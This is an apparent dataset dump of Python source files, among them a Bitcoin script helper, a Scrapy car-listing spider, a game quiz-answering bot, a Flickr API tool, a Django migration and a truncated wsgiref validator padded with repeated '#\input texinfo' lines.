blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
fb5bf4f07951d84bf342ddda620e4f8ab7c0a109 | f65c78a69fbf9acb39f5b55a77565c491accccd1 | /libs/common/bitcoin/script.py | 5e4daafb10d6b6d794552c76082a923f8d133d76 | [
"MIT"
]
| permissive | Kevingislason/abacus_wallet | 8ac5b9f5edc33cba3812f98e0040729e8be6bd98 | 3c0f2d5134a6fa59fc1fd15fcad65690352a46bf | refs/heads/main | 2023-03-21T23:24:16.012416 | 2021-03-15T02:56:11 | 2021-03-15T02:56:11 | 334,851,360 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,916 | py | from .networks import NETWORKS
from . import base58
from . import bech32
from . import hashes
from . import compact
import io
SIGHASH_ALL = 1
class Script:
def __init__(self, data: bytes):
self.data = data[:]
def address(self, network=NETWORKS["main"]) -> str:
script_type = self.script_type()
data = self.data
if script_type is None:
raise ValueError("This type of script doesn't have address representation")
if script_type == "p2pkh":
d = network["p2pkh"] + data[3:23]
return base58.encode_check(d)
if script_type == "p2sh":
d = network["p2sh"] + data[2:22]
return base58.encode_check(d)
if script_type == "p2wpkh" or script_type == "p2wsh":
return bech32.encode(network["bech32"], data[0], data[2:])
# we should never get here
raise ValueError("Unsupported script type")
def script_type(self):
data = self.data
# OP_DUP OP_HASH160 <20:hash160(pubkey)> OP_EQUALVERIFY OP_CHECKSIG
if len(data) == 25 and data[:3] == b"\x76\xa9\x14" and data[-2:] == b"\x88\xac":
return "p2pkh"
# OP_HASH160 <20:hash160(script)> OP_EQUAL
if len(data) == 23 and data[:2] == b"\xa9\x14" and data[-1] == 0x87:
return "p2sh"
# 0 <20:hash160(pubkey)>
if len(data) == 22 and data[:2] == b"\x00\x14":
return "p2wpkh"
# 0 <32:sha256(script)>
if len(data) == 34 and data[:2] == b"\x00\x20":
return "p2wsh"
# unknown type
return None
def serialize(self) -> bytes:
return compact.to_bytes(len(self.data)) + self.data
@classmethod
def parse(cls, b: bytes) -> cls:
stream = io.BytesIO(b)
script = cls.read_from(stream)
if len(stream.read(1)) > 0:
raise ValueError("Too many bytes")
return script
@classmethod
def read_from(cls, stream) -> cls:
l = compact.read_from(stream)
data = stream.read(l)
if len(data) != l:
raise ValueError("Cant read %d bytes" % l)
return cls(data)
def __eq__(self, other):
return self.data == other.data
def __ne__(self, other):
return self.data != other.data
class Witness:
def __init__(self, items):
self.items = items[:]
def serialize(self) -> bytes:
res = compact.to_bytes(len(self.items))
for item in self.items:
res += compact.to_bytes(len(item)) + item
return res
@classmethod
def parse(cls, b: bytes) -> cls:
stream = io.BytesIO(b)
r = cls.read_from(stream)
if len(stream.read(1)) > 0:
raise ValueError("Byte array is too long")
return r
@classmethod
def read_from(cls, stream) -> cls:
num = compact.read_from(stream)
items = []
for i in range(num):
l = compact.read_from(stream)
data = stream.read(l)
items.append(data)
return cls(items)
def p2pkh(pubkey) -> Script:
"""Return Pay-To-Pubkey-Hash ScriptPubkey"""
return Script(b"\x76\xa9\x14" + hashes.hash160(pubkey.sec()) + b"\x88\xac")
def p2sh(script) -> Script:
"""Return Pay-To-Script-Hash ScriptPubkey"""
return Script(b"\xa9\x14" + hashes.hash160(script.data) + b"\x87")
def p2wpkh(pubkey) -> Script:
"""Return Pay-To-Witness-Pubkey-Hash ScriptPubkey"""
return Script(b"\x00\x14" + hashes.hash160(pubkey.sec()))
def p2wsh(script) -> Script:
"""Return Pay-To-Witness-Pubkey-Hash ScriptPubkey"""
return Script(b"\x00\x20" + hashes.sha256(script.data))
def p2pkh_from_p2wpkh(script) -> Script:
"""Convert p2wpkh to p2pkh script"""
return Script(b"\x76\xa9" + script.serialize()[2:] + b"\x88\xac")
def multisig(m: int, pubkeys) -> Script:
if m <= 0 or m > 16:
raise ValueError("m must be between 1 and 16")
n = len(pubkeys)
if n < m or n > 16:
raise ValueError("Number of pubkeys must be between %d and 16" % m)
data = bytes([80 + m])
for pubkey in pubkeys:
sec = pubkey.sec()
data += bytes([len(sec)]) + sec
# OP_m <len:pubkey> ... <len:pubkey> OP_n OP_CHECKMULTISIG
data += bytes([80 + n, 0xAE])
return Script(data)
def address_to_scriptpubkey(addr):
pass
def script_sig_p2pkh(signature, pubkey) -> Script:
sec = pubkey.sec()
der = signature.serialize() + bytes([SIGHASH_ALL])
data = compact.to_bytes(len(der)) + der + compact.to_bytes(len(sec)) + sec
return Script(data)
def script_sig_p2sh(redeem_script) -> Script:
"""Creates scriptsig for p2sh"""
# FIXME: implement for legacy p2sh as well
return Script(redeem_script.serialize())
def witness_p2wpkh(signature, pubkey) -> Witness:
return Witness([signature.serialize() + bytes([SIGHASH_ALL]), pubkey.sec()])
| [
"[email protected]"
]
| |
1ce44c79b815d8df6680a3212721e78e49837ae6 | 138c1b7a726386b6e9bafb9fcd42c7e62d9fe49e | /ScrapyProjects/DynamicSpider/DynamicSpider/spiders/guazi.py | b662668c881943737dbbd1a9bd8a5ed621eb1462 | []
| no_license | zhujixiang1997/1805_spider | 951bf6e5d411c0b24b33adf788c9d8a5770f244b | 5cd617e5e3263d13854e19c16a1659017a8ed409 | refs/heads/master | 2022-12-11T01:10:54.232536 | 2019-07-09T10:28:30 | 2019-07-09T10:28:30 | 163,835,828 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,575 | py | # -*- coding: utf-8 -*-
import scrapy
from ScrapyProjects.DynamicSpider.DynamicSpider.items import GuaziCarItem
from ScrapyProjects.DynamicSpider.DynamicSpider.utils.bshead import create_bs_driver
'''
爬取瓜子二手车直卖网武汉二手车
分析:采用scrapy shrll爬取页面,分析页面后,发现获取不到数据,引入selenium
方案:scrapy + selenium
'''
class GuaziSpider(scrapy.Spider):
name = 'guazi'
allowed_domains = ['www.guazi.com']
start_urls = ['http://www.guazi.com/wh/buy/']
query_key = input("请输入关键字:")
def __init__(self):
scrapy.Spider.__init__(self, self.name)
self.driver = create_bs_driver()
self.driver.set_page_load_timeout(20)
def __del__(self):
self.driver.quit()
def start_requests(self):
# 重写初始化url请求,携带上信息,下载中间价能识别
for url in self.start_urls:
yield scrapy.Request(url=url, meta={'type':'home','query_key':self.query_key}, callback=self.parse, dont_filter=True)
def parse(self, response):
print(f"{response.url}")
cal_li_list = response.xpath("//ul[@class='carlist clearfix js-top']/li")
for cal_li in cal_li_list:
car_name = cal_li.xpath("./a/h2/text()").extract_first()
car_image = cal_li.xpath("./a/img/@src").extract_first()
car_detail_url = cal_li.xpath("./a/@href").extract_first()
meta=dict(car_name=car_name,car_image=car_image,type="detail")
yield scrapy.Request(url=f"https://www.guazi.com{car_detail_url}", meta=meta, callback=self.parse_detail, dont_filter=True)
# 获取下一页
next_url = response.url
meta = dict(type="next_page")
yield scrapy.Request(url=next_url, meta=meta, callback=self.parse, dont_filter=True)
def parse_detail(self,response):
car_name=response.meta.get("car_name")
car_image=response.meta.get("car_image")
registration_time = response.xpath("//ul[@class='assort clearfix']/li[1]/span/text()").extract_first()
mileage = response.xpath("//ul[@class='assort clearfix']/li[2]/span/text()").extract_first()
license_plate = response.xpath("//ul[@class='assort clearfix']/li[3]/span/text()").extract_first()
displacement = response.xpath("//ul[@class='assort clearfix']/li[4]/span/text()").extract_first()
transmission = response.xpath("//ul[@class='assort clearfix']/li[5]/span/text()").extract_first()
price = response.xpath("//div[@class='pricebox js-disprice']/span[1]/text()").extract_first()
result = {
'car_name':car_name if car_name else None,
'car_image':car_image if car_image else None,
'registration_time':registration_time if registration_time else None,
'mileage':mileage if mileage else None,
'license_plate':license_plate if license_plate else None,
'displacement':displacement if displacement else None,
'transmission':transmission if transmission else None,
'price':price+'万' if price else None,
}
item = GuaziCarItem(
car_name=result['car_name'],
car_image=result['car_image'],
registration_time=result['registration_time'],
mileage=result['mileage'],
license_plate=result['license_plate'],
displacement=result['displacement'],
transmission=result['transmission'],
price=result['price'],
)
yield item
| [
"[email protected]"
]
| |
32d15c69d2a035c6bbc6bbe67bbb271dd540c1f0 | 731230c336bf27af8ca91f15c33435920a5c3af4 | /virtual/bin/wheel | 599ecec06807b1ead412bf660847330f6744e209 | [
"MIT"
]
| permissive | Brayonski/personal-blog | c627adbddf66271594f07e7bd3e3b2069c9aff08 | ab0cb6590b570ed75a475a52eae9bafadc647665 | refs/heads/master | 2020-03-28T17:34:10.867299 | 2018-09-17T13:10:12 | 2018-09-17T13:10:12 | 148,802,537 | 0 | 0 | null | 2018-10-11T13:39:58 | 2018-09-14T14:48:33 | Python | UTF-8 | Python | false | false | 281 | #!/media/root/Alpha/projects/MS-Python-Pre-work/flask/personal-blog/virtual/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from wheel.tool import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"[email protected]"
]
| ||
3210b53b1f11a7512ae651e9a24340fa8190d8c2 | cfd9fa1af735ac3572954704a47e35543850b244 | /lantern.py | 6811ad214abe5ef2f1a2dfe9f75e48022f4f9798 | []
| no_license | xingyueGK/hjsg | c1844ea8161d254f6d6cf70f42d1ac849e117438 | be0c4c457bdfaa9178f25f9f722dc78d88f24540 | refs/heads/master | 2022-12-12T08:28:55.823357 | 2020-12-05T12:02:06 | 2020-12-05T12:02:06 | 147,184,573 | 0 | 1 | null | 2022-01-06T22:26:48 | 2018-09-03T09:47:04 | HTML | UTF-8 | Python | false | false | 6,224 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2019/2/19 15:08
# @Author : xingyue
# @File : lantern.py
from task.base import SaoDangFb
import threading
import os, time
import redis
pool = redis.ConnectionPool(host='localhost', port=6379, db=0)
_redis = redis.StrictRedis(connection_pool=pool)
lock = threading.RLock()
class task(SaoDangFb):
def lanternIndex(self):
stats = self.action(c='guess_lantern', m='index')
if stats['status']== 1:
print '开始答题'
else:
self.p(stats)
exit(2)
def lantern_festival(self):
try:
answer = {
"1": "a",
"2": "b",
"3": "c",
"4": "d",
"5": "b",
"6": "d",
"7": "d",
"8": "d",
"9": "d",
"10": "a",
"11": "a",
"12": "a",
"13": "b",
"14": "b",
"15": "a",
"16": "c",
"17": "b",
"18": "d",
"19": "a",
"20": "c",
"21": "c",
"22": "a",
"23": "d",
"24": "a",
"25": "a",
"26": "c",
"27": "a",
"28": "b",
"29": "a",
"30": "a",
"31": "a",
"32": "b",
"33": "b",
"34": "b",
"35": "c",
"36": "c",
"37": "d",
"38": "d",
"39": "c",
"40": "b",
"41": "a",
"42": "a",
"44": "a",
"45": "b",
"46": "c",
"48": "a",
"49": "b",
"50": "d",
"51": "c",
"52": "a",
"54": "a",
"55": "d",
"56": "d",
"58": "b",
"59": "b",
"61": "d",
"62": "d",
"63": "d",
"67": "b",
"68": "a",
"69": "b",
"71": "d",
"73": "b",
"74": "a",
"75": "d",
"76": "a",
"77": "b",
"78": "b",
"43": "d",
"47": "d",
"53": "c",
"57": "d",
"60": "c",
"64": "d",
"65": "d",
"66": "b",
"70": "c",
"72": "a",
"79": "c",
"80": "a",
"81": "a",
"82": "d",
"83": "b",
"84": "a",
"85": "c",
"86": "b",
"87": "b",
"88": "b",
"89": "d",
"90": "d",
"91": "b",
"92": "c",
"93": "c",
"94": "b",
"95": "c",
"96": "a",
"97": "d",
"98": "d",
"99": "a",
"100": "c",
"101": "c",
"102": "a",
"103": "b",
"104": "a",
"105": "c",
"106": "a",
"107": "a",
"108": "b",
"109": "c",
"110": "b",
"111": "d",
"112": "b",
"113": "d",
"114": "b",
"115": "a",
"116": "a",
"117": "b",
"118": "b",
"119": "c",
"120": "d",
}
resutl = self.action(c='guess_lantern', m='answer_index')
time.sleep(0.5)
total_num = int(resutl['total_num'])
for i in range(total_num):
questiont = resutl['question']
id = questiont['id']
try:
formdata = {
'right': answer[id]
}
except KeyError as e:
print 'id error ,chaoguo xianzhi '
self.p(questiont, 'iderror')
formdata = {
'right': 'a'
}
resutl = self.action(c='guess_lantern', m='check', body=formdata)
self.p(resutl,'resieeeeeeee')
while True:
if resutl['status'] == 1:
if resutl['right'] == 1:
time.sleep(2)
break
else:
self.p(resutl, 'check result')
print formdata
break
elif resutl['status'] == -10:
time.sleep(5)
resutl = self.action(c='guess_lantern', m='check', body=formdata)
except KeyError as e:
self.p(resutl, 'error')
print 'eeeee',e
def get_reward(self):
self.action(c='guess_lantern', m='get_reward', id=1)
if __name__ == '__main__':
def act(user, apass, addr):
action = task(user, apass, addr)
action.lanternIndex()#开始答题
action.lantern_festival()
action.get_reward()
filepath = os.path.dirname(os.path.abspath(__file__))
# cont = ['21user.txt', 'autouser.txt','gmnewyear.txt', 'user.txt', 'alluser.txt']
cont = ['user.txt']
for t in cont:
with open('%s/users/%s' % (filepath, t), 'r') as f:
for i in f:
if i.strip() and not i.startswith('#'):
name = i.split()[0]
passwd = i.split()[1]
addr = i.split()[2]
# addr = 21
t1 = threading.Thread(target=act, args=(name, passwd, addr))
t1.start()
time.sleep(0.2)
| [
"[email protected]"
]
| |
068b41a94bea56acb225e23b723347f3b9e3b552 | 8fc9520d7224e6179f63f19e668b4b3b6a7d76c5 | /apps/networks/libraries/flickr/tools.py | 983d95c4458171972fa5c25ad14ae1aa7f71d267 | []
| no_license | quantm/custom_django_oscar | 352ef2fd95e7da932958d4aa80d77dff5b6c1e70 | 9205807030ab360884283810e94177440c228a23 | refs/heads/master | 2016-08-09T12:23:39.413677 | 2016-02-08T22:16:53 | 2016-02-08T22:16:53 | 51,326,524 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,084 | py | from method_call import call_api
import sys
import os
def load_methods():
"""
Loads the list of all methods
"""
r = call_api(method="flickr.reflection.getMethods")
return r["methods"]["method"]
__perms__ = {0: 'none', '1': 'read', '2': 'write', '3': 'delete'}
def methods_info():
methods = {}
for m in load_methods():
info = call_api(method="flickr.reflection.getMethodInfo",
method_name=m)
info.pop("stat")
method = info.pop("method")
method["requiredperms"] = __perms__[method["requiredperms"]]
method["needslogin"] = bool(method.pop("needslogin"))
method["needssigning"] = bool(method.pop("needssigning"))
info.update(method)
info["arguments"] = info["arguments"]["argument"]
info["errors"] = info["errors"]["error"]
methods[m] = info
return methods
def write_reflection(path, template, methods=None):
if methods is None:
methods = methods_info()
with open(template, "r") as t:
templ = t.read()
prefix = ""
new_templ = ""
tab = " "
templ = templ % str(methods)
for c in templ:
if c == '{':
new_templ += '{\n' + prefix
prefix += tab
elif c == '}':
new_templ += '\n' + prefix + '}\n' + prefix
prefix = prefix[:-len(tab)]
else:
new_templ += c
with open(path, "w") as f:
f.write(new_templ)
def write_doc(output_path, exclude=["flickr_keys", "methods"]):
import flickr_api
exclude.append("__init__")
modules = ['flickr_api']
dir = os.path.dirname(flickr_api.__file__)
modules += [
"flickr_api." + f[:-3]
for f in os.listdir(dir)
if f.endswith(".py") and f[:-3] not in exclude]
sys.path.insert(0, dir + "../")
if not os.path.exists(output_path):
os.makedirs(output_path)
os.chdir(output_path)
for m in modules:
os.system("pydoc -w " + m)
| [
"[email protected]"
]
| |
af55ae8008e31b19d12765e34394ed945e13896b | f672f2c2b35d388526217278f3c301d4372abb4b | /cartoview/app_manager/migrations/0001_initial.py | 31b23a5245af1452dea592580640ac9fb684c4cb | [
"BSD-2-Clause"
]
| permissive | Msalah593/cartoview_2 | cce51db13f3e69e99a4915770627942d21a998a8 | dc57cc22cdc4563ff76448b939c09c370590114f | refs/heads/master | 2020-05-05T12:29:26.333491 | 2019-04-22T08:52:52 | 2019-04-22T08:52:52 | 180,030,874 | 0 | 0 | null | 2019-04-07T22:22:08 | 2019-04-07T22:22:08 | null | UTF-8 | Python | false | false | 1,764 | py | # Generated by Django 2.2 on 2019-04-18 14:17
import django.contrib.postgres.fields.jsonb
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='App',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200, unique=True)),
('title', models.CharField(max_length=200, unique=True)),
('description', models.TextField(blank=True, null=True)),
('license', models.CharField(blank=True, max_length=200, null=True)),
('date_installed', models.DateTimeField(auto_now_add=True, null=True, verbose_name='Date Installed')),
('single_instance', models.BooleanField(default=False)),
('status', models.CharField(default='Alpha', max_length=100)),
('app_img_url', models.TextField(blank=True, max_length=1000, null=True)),
('version', models.CharField(max_length=10)),
('order', models.IntegerField(default=0, unique=True)),
('default_config', django.contrib.postgres.fields.jsonb.JSONField(blank=True, default=dict, null=True)),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
],
options={
'ordering': ['order'],
'permissions': (('install_app', 'Install App'), ('uninstall_app', 'Uninstall App'), ('change_state', 'Change App State (active, suspend)')),
},
),
]
| [
"[email protected]"
]
| |
8396320380ca63e38dcfcc70b5428ef49c1972ad | 6437a3a4a31ab9ad233d6b2d985beb50ed50de23 | /PythonistaAppTemplate/PythonistaKit.framework/pylib/wsgiref/validate.py | b5577e5bbf54a2e99cc84fc8a1e1f3b1edf2aaa9 | []
| no_license | sreyemnayr/jss-lost-mode-app | 03ddc472decde3c17a11294d8ee48b02f83b71e7 | 3ff4ba6fb13f4f3a4a98bfc824eace137f6aabaa | refs/heads/master | 2021-05-02T08:50:10.580091 | 2018-02-08T20:32:29 | 2018-02-08T20:32:29 | 120,813,623 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 19,451 | py | #\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
# (c) 2005 Ian Bicking and contributors; written for Paste (http://pythonpaste.org)
# Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
# Also licenced under the Apache License, 2.0: http://opensource.org/licenses/apache2.0.php
# Licensed to PSF under a Contributor Agreement
"""
Middleware to check for obedience to the WSGI specification.
Some of the things this checks:
* Signature of the application and start_response (including that
keyword arguments are not used).
* Environment checks:
- Environment is a dictionary (and not a subclass).
- That all the required keys are in the environment: REQUEST_METHOD,
SERVER_NAME, SERVER_PORT, wsgi.version, wsgi.input, wsgi.errors,
wsgi.multithread, wsgi.multiprocess, wsgi.run_once
- That HTTP_CONTENT_TYPE and HTTP_CONTENT_LENGTH are not in the
environment (these headers should appear as CONTENT_LENGTH and
CONTENT_TYPE).
- Warns if QUERY_STRING is missing, as the cgi module acts
unpredictably in that case.
- That CGI-style variables (that don't contain a .) have
(non-unicode) string values
- That wsgi.version is a tuple
- That wsgi.url_scheme is 'http' or 'https' (@@: is this too
restrictive?)
- Warns if the REQUEST_METHOD is not known (@@: probably too
restrictive).
- That SCRIPT_NAME and PATH_INFO are empty or start with /
- That at least one of SCRIPT_NAME or PATH_INFO are set.
- That CONTENT_LENGTH is a positive integer.
- That SCRIPT_NAME is not '/' (it should be '', and PATH_INFO should
be '/').
- That wsgi.input has the methods read, readline, readlines, and
__iter__
- That wsgi.errors has the methods flush, write, writelines
* The status is a string, contains a space, starts with an integer,
and that integer is in range (> 100).
* That the headers is a list (not a subclass, not another kind of
sequence).
* That the items of the headers are tuples of strings.
* That there is no 'status' header (that is used in CGI, but not in
WSGI).
* That the headers don't contain newlines or colons, end in _ or -, or
contain characters codes below 037.
* That Content-Type is given if there is content (CGI often has a
default content type, but WSGI does not).
* That no Content-Type is given when there is no content (@@: is this
too restrictive?)
* That the exc_info argument to start_response is a tuple or None.
* That all calls to the writer are with strings, and no other methods
on the writer are accessed.
* That wsgi.input is used properly:
- .read() is called with zero or one argument
- That it returns a string
- That readline, readlines, and __iter__ return strings
- That .close() is not called
- No other methods are provided
* That wsgi.errors is used properly:
- .write() and .writelines() is called with a string
- That .close() is not called, and no other methods are provided.
* The response iterator:
- That it is not a string (it should be a list of a single string; a
string will work, but perform horribly).
- That .next() returns a string
- That the iterator is not iterated over until start_response has
been called (that can signal either a server or application
error).
- That .close() is called (doesn't raise exception, only prints to
sys.stderr, because we only know it isn't called when the object
is garbage collected).
"""
__all__ = ['validator']
import re
import sys
from types import DictType, StringType, TupleType, ListType
import warnings
header_re = re.compile(r'^[a-zA-Z][a-zA-Z0-9\-_]*$')
bad_header_value_re = re.compile(r'[\000-\037]')
class WSGIWarning(Warning):
"""
Raised in response to WSGI-spec-related warnings
"""
def assert_(cond, *args):
if not cond:
raise AssertionError(*args)
def validator(application):
"""
When applied between a WSGI server and a WSGI application, this
middleware will check for WSGI compliancy on a number of levels.
This middleware does not modify the request or response in any
way, but will raise an AssertionError if anything seems off
(except for a failure to close the application iterator, which
will be printed to stderr -- there's no way to raise an exception
at that point).
"""
def lint_app(*args, **kw):
assert_(len(args) == 2, "Two arguments required")
assert_(not kw, "No keyword arguments allowed")
environ, start_response = args
check_environ(environ)
# We use this to check if the application returns without
# calling start_response:
start_response_started = []
def start_response_wrapper(*args, **kw):
assert_(len(args) == 2 or len(args) == 3, (
"Invalid number of arguments: %s" % (args,)))
assert_(not kw, "No keyword arguments allowed")
status = args[0]
headers = args[1]
if len(args) == 3:
exc_info = args[2]
else:
exc_info = None
check_status(status)
check_headers(headers)
check_content_type(status, headers)
check_exc_info(exc_info)
start_response_started.append(None)
return WriteWrapper(start_response(*args))
environ['wsgi.input'] = InputWrapper(environ['wsgi.input'])
environ['wsgi.errors'] = ErrorWrapper(environ['wsgi.errors'])
iterator = application(environ, start_response_wrapper)
assert_(iterator is not None and iterator != False,
"The application must return an iterator, if only an empty list")
check_iterator(iterator)
return IteratorWrapper(iterator, start_response_started)
return lint_app
class InputWrapper:
def __init__(self, wsgi_input):
self.input = wsgi_input
def read(self, *args):
assert_(len(args) <= 1)
v = self.input.read(*args)
assert_(type(v) is type(""))
return v
def readline(self):
v = self.input.readline()
assert_(type(v) is type(""))
return v
def readlines(self, *args):
assert_(len(args) <= 1)
lines = self.input.readlines(*args)
assert_(type(lines) is type([]))
for line in lines:
assert_(type(line) is type(""))
return lines
def __iter__(self):
while 1:
line = self.readline()
if not line:
return
yield line
def close(self):
assert_(0, "input.close() must not be called")
class ErrorWrapper:
def __init__(self, wsgi_errors):
self.errors = wsgi_errors
def write(self, s):
assert_(type(s) is type(""))
self.errors.write(s)
def flush(self):
self.errors.flush()
def writelines(self, seq):
for line in seq:
self.write(line)
def close(self):
assert_(0, "errors.close() must not be called")
class WriteWrapper:
def __init__(self, wsgi_writer):
self.writer = wsgi_writer
def __call__(self, s):
assert_(type(s) is type(""))
self.writer(s)
class PartialIteratorWrapper:
def __init__(self, wsgi_iterator):
self.iterator = wsgi_iterator
def __iter__(self):
# We want to make sure __iter__ is called
return IteratorWrapper(self.iterator, None)
class IteratorWrapper:
def __init__(self, wsgi_iterator, check_start_response):
self.original_iterator = wsgi_iterator
self.iterator = iter(wsgi_iterator)
self.closed = False
self.check_start_response = check_start_response
def __iter__(self):
return self
def next(self):
assert_(not self.closed,
"Iterator read after closed")
v = self.iterator.next()
if self.check_start_response is not None:
assert_(self.check_start_response,
"The application returns and we started iterating over its body, but start_response has not yet been called")
self.check_start_response = None
return v
def close(self):
self.closed = True
if hasattr(self.original_iterator, 'close'):
self.original_iterator.close()
def __del__(self):
if not self.closed:
sys.stderr.write(
"Iterator garbage collected without being closed")
assert_(self.closed,
"Iterator garbage collected without being closed")
def check_environ(environ):
assert_(type(environ) is DictType,
"Environment is not of the right type: %r (environment: %r)"
% (type(environ), environ))
for key in ['REQUEST_METHOD', 'SERVER_NAME', 'SERVER_PORT',
'wsgi.version', 'wsgi.input', 'wsgi.errors',
'wsgi.multithread', 'wsgi.multiprocess',
'wsgi.run_once']:
assert_(key in environ,
"Environment missing required key: %r" % (key,))
for key in ['HTTP_CONTENT_TYPE', 'HTTP_CONTENT_LENGTH']:
assert_(key not in environ,
"Environment should not have the key: %s "
"(use %s instead)" % (key, key[5:]))
if 'QUERY_STRING' not in environ:
warnings.warn(
'QUERY_STRING is not in the WSGI environment; the cgi '
'module will use sys.argv when this variable is missing, '
'so application errors are more likely',
WSGIWarning)
for key in environ.keys():
